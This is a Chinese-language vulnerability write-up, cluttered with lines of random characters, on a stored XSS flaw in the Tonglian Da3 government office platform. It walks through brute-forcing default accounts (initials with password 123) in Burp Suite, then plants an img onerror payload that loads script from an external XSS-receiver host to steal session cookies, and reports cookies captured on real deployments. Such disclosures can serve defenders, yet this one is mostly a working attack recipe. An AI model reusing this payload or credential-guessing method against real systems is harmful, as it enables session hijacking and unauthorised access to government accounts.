" @ R; H: g a$ J: T
. W! y3 d% {( Z 同联Da3协同办公平台后台通用储存型xss漏洞6 r; b8 G3 ?+ C% J
/ D% S( P4 Y( T$ t
, w7 |# D) |$ i! y: } 平台简介:6 O# P: \: x5 A) _: x: w
* `# C0 f% D" P9 J# q( ~
* {8 s; c5 j" k5 V
0 \1 o1 Q! |, R4 ^- z1 M
+ ~0 A! I* l) Z1 g( ~" O
) h# y7 S- I' b( c7 R1 C \' N 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
) V0 @* Y' w4 b1 X同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
8 J& Q: ]4 k- A* E$ z6 [( |
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!4 q1 E/ K0 h0 H" @$ x2 w! V* |
% x$ P2 L7 ^# D
( {8 q; M! \7 n+ s% Q
6 v1 W, ^( J' L% A3 `
# c. M" d% Q& ]4 p
" C; W' Q! i! T2 x2 u 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
( U, ^) b" y4 C: W- B/ Z( B
0 R6 U4 Z( O0 k, q6 b
, T" y, B9 X% Y( p. y- j. N
/ p6 \ H& P) e% X! V6 k$ }
; _/ d3 e2 k, y * N' z- `7 B3 A: Z3 I" i
http://1.1.1.1:7197/cap-aco/#(案例2-)
2 C3 O4 k# X4 V0 v ^
& {! ~: ^% |6 {- i A
/ t8 k0 ^0 T' L9 L* ?! V- P http://www.XXOO.com (案例1-官网网站)
' |' `' q$ a! M% \. O9 j
6 M- W) D, V8 W, }9 N
9 {/ u2 I7 v, N) G* ]$ b; x 漏洞详情:
( O1 K0 c+ |$ \( i1 s* }7 u0 A
8 E. r- X5 P0 P: Q6 b; G0 ?; k ! }8 z B3 v8 p0 _
案例一、( L+ l5 [! [2 S7 b8 {- _; k+ |. m
% w4 I* S* U' n$ D G) s/ ]
. T' A3 A8 j( X: W1 W5 I) G
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
8 t. N2 f$ v" n9 O7 Q$ f: N
N0 z- @1 T( P% E# u5 ^( r
) F. E4 l" j8 U( A 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
P/ n! K* X- m( k0 ?; r' R; b
4 _& p0 ? m! I
* V4 P3 k" u( @3 s& p * K) [/ q: h8 ]2 G
7 L4 I6 F+ w8 ~" n/ T8 C
3 l# N( C) n2 g 
T, M' b3 D' s
" ?) q$ v# x- ]' D. v$ G. n : j# y) r$ r, C0 J# u! _* z! Q
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: , c! K* i1 Z9 q. V* M
3 z2 e2 J- i `2 n3 G8 J/ A5 a
+ q/ l: ]5 K9 ~9 z- p4 V 8 `* V' j3 h, b( W- R/ f
& D$ G+ N2 X' i5 I
3 v n0 N" Z: |% J6 B; i: [. ~
) o8 ]+ r5 a3 Q7 r
\8 F! y6 l$ [- }. o& C; j7 k
h( D( Y& n% G" C- H( D# S0 ? 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
( Y$ Y) }& E: q4 O7 B- w. @) Q
8 W$ J% {8 T6 \( ?, o & G) h" I% A i/ m0 Z
$ y+ k3 d. \0 z8 R9 J
* r) S' T6 H; d, F" D4 o" t
) K3 b* L- m5 }' F( `9 Q7 n <img src=x: ?) z3 x, Q7 w) }( ]0 \) I6 n
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: 3 e" ~6 V {. @' }1 I1 l
- ]( {. _ U* x; d- R
/ s3 a5 O6 i: u( u0 Z( U: `; S; q3 ? 
' e# T' O C2 G L6 q
# R6 ?3 N% m# l% r: N; y* Z # h# r6 ^) S6 F9 c7 J& F4 {
然后发送,接收cookie如图:
8 T- o9 d5 G1 y/ n* b; f: y4 e4 V
9 H1 m1 Z Y1 T, K9 w & U) `4 M- X3 i0 ]
6 W- ]4 V$ V" g2 T9 s1 ~4 s, @, W( T
6 Y$ m& @0 z2 a6 A% C" Q
% Q* U3 I5 i4 | a8 ~
4 R! X3 K f/ s1 D+ e9 e" I. g7 e
$ S/ e3 i. i4 w. s
7 ?. @( Z; @0 P" _, t m
2 Y. Q2 e: L* q( N
: Z: D2 s, G* Z4 W# ^. L 0 | i/ D( ?' F
r" u/ W* f" C6 ~- ~# T. p q' `" [. u
. v( }2 M0 F9 O+ A% g) z' x 4 k+ l* D/ i1 ~
/ [7 h7 V, \3 p6 Q
) i3 P% i' Z" B$ b& h/ ~
) W1 x8 a+ H( I+ n9 k5 I9 f
" d6 @ U8 Q; A M: T4 h
# L& W4 d. ], A 9 E0 P0 N4 Y* J, ?% O6 {6 ^
" i V9 V" |% e, Y, r
5 @& u# C. O$ U# y, t) s, w% g ! H, d$ }, _0 }% Z# l
案例2、 + x0 }* x% h0 R
. l( E/ }/ n, A% [% R- A, v 2 ]* t0 T# K' ?; q5 |
前面步骤都一样,下面看效果图: 6 z. s* w) Q, r5 c4 w
# H& e- ]" E' c4 c1 T
A J; k, d$ l5 @5 j 
$ @' `5 @: ?. u, r/ j. j8 ^( h
4 o! n* ^- { r" w3 L
; Z* h0 q+ l& J9 F& e/ q& f 
9 R2 d1 _* \, A, I1 c& i
& u2 }: C) F9 x; N. N: o
; ~! m" \! `* l9 i! `+ l
1 Q% q! V+ O, _! ~" N% O; ^6 K
1 G, h! s7 v! ]
" ~% k w* _9 K) l4 Z ! a( I; ]8 h& r- F9 I9 Z/ C
! f5 I" g6 U. g9 X. v; k
0 ]$ d( O, m* u1 y0 [& h; n 
( }1 a! f0 X; O0 b5 x
$ h1 N. G/ n6 \ \, P/ X. j
9 c: O9 M1 Y8 X$ h
7 G- v+ u% K+ ^8 M8 r+ i
, `' a+ N# r% H, |5 Y* a' Q
7 i" L& F) c$ [- Y8 U! T
0 q5 l+ n" i/ S" n" q: j
8 c0 F( s. P7 ? + O$ m6 T! o: T w+ e! W4 f& H
! g- M/ {, A& s
4 X# Q% |1 U/ u
5 ?4 R' I4 a' R; h% b
: D# m3 v- `* d4 x; {. m
* H. W9 D1 {7 [ X, d, s" w; f# P